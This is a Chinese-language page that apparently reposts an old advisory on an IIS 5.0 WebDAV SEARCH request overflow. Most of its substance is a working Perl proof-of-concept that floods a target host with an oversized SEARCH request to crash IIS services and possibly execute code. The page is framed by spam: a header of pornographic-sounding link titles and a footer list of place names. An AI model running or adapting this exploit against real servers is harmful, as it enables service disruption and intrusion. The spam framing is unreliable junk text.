国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 學院 > 開發設計 > 正文

IIS 處理 SEARCH 請求漏洞

2019-11-18 21:05:35
字體:
來源:轉載
供稿:網友
涉及程序:
IIS
  
描述:
通過構造特殊的 SEARCH 請求導致 IIS 執行攻擊者代碼漏洞
  
詳細:
發現 IIS 在處理 SEARCH 請求時存在漏洞,攻擊者通過提交構造特殊的 IIS SEARCH 請求能重啟與 IIS 相關的所有服務,而且可能遠程執行任意代碼。

以下代碼僅僅用來測試和研究這個漏洞,如果您將其用于不正當的途徑請后果自負



Details:
--vv6.pl-------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
PRintf "IIS 5.0 SEARCH/nWritten by Georgi Guninski wait some time/n";
if(@ARGV < 2) { die "/nUsage: IIS5host port /n"; }
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
$over=$ch x $ll; #string to overflow
$xml='<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE
("'.$over.'")</D:sql></D:searchrequest>'."/n";
$l=length($xml);
$req="SEARCH / HTTP/1.1/nContent-type: text/xml/nHost: $host/nContent-length: $l/n/n$xml/n/n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;
close $socket;
}
do vv(126000,"V");
sleep(1);
do vv(126000,"V");
#Try 125000 - 128000
---------------------------------------------------------------

受影響系統:
IIS 5.0  

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 古蔺县| 荃湾区| 靖宇县| 莱阳市| 会东县| 贵阳市| 同江市| 重庆市| 太湖县| 寿阳县| 聊城市| 叙永县| 元谋县| 宜宾县| 涞水县| 阿勒泰市| 美姑县| 昌都县| 大悟县| 广安市| 朔州市| 泸水县| 高要市| 永靖县| 巫山县| 正镶白旗| 曲水县| 定结县| 嘉义县| 林西县| 嘉义市| 天柱县| 浑源县| 陵水| 屏东县| 韶山市| 新巴尔虎左旗| 和田县| 容城县| 平邑县| 合作市|